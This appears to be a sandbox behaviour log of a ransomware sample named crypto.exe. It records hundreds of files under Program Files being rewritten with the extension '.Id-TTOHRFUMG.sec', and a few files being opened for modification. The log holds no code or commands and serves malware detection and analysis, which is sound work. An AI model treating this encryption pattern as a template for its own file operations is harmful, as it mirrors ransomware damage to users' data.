File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115865.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX9.x3d.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.access.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Tehran.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ApothecaryNewsletter.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00513_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPrintTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_smem_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01240_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15019_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21366_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR43B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\FLYER98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PICTPH.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libttml_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21413_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN002.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-localization-l1-2-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Rainy_River.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\descript.ion.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OFFRHD.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08773_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Clarity.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\librawvideo_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ca.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00171_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libavcodec_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\2.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.war.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\oisctrl.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\38.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\MINUS.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02141_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\LICENSE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090087.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\GKPowerPoint.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_MCELogo_mouseout.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Copenhagen.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\MST7MDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ACCOLKI.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+6.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\security\javaws.policy.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00512_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10267_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADDINS\PMAILEXT.ECF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\AWARDHM.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mset7.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\en-US\WMPDMCCore.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\kab.txt.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\keystore\libfile_keystore_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\XLSLICER.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00413_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00454_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21324_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\UnformattedNumeric.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\DRUMROLL.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\security\javafx.policy.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15185_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\Templates\Music.jtp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baghdad.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CST6CDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jp2native.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR27F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Earthy.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL109.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\logsession.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\NEWSHM.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04196_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00557_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\REC.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Track Issues.fdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_splitter\libpanoramix_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\java.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\en-US\TableTextService.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01242_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Araguaina.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00685_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106572.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\INFOPATH_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libgme_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\month.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif	crypto.exe
File created	C:\Program Files\Java\jre7\bin\t2k.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01635_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00531L.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ru.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\43.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101864.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00402_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libmediadirs_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\library.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ACCWIZ\ACWZDAT12.ACCDU.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15021_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEW.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_pressed.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215710.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09664_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL058.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yakutat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18244_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libnsv_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libmagnify_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.SYX.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00779_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281243.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14794_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libdxva2_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152876.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14581_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\cpu.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00195_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonUp_On.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiBold.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18182_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SECURS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24Images.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ml.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\en-US\wmpnssci.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Luis.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02749G.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01238_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Installed_resources14.xss.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\5.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\charsets.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\servertool.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\BUTTON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_tr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_LightSpirit.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PROG98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libcache_block_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\librawaud_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\POWERPNT.DEV_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\liberase_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Costa_Rica.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02085_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ONINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADDINS\BCSAddin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\DELIMDOS.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24ImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.dll.Id-TTOHRFUMG.sec	crypto.exe
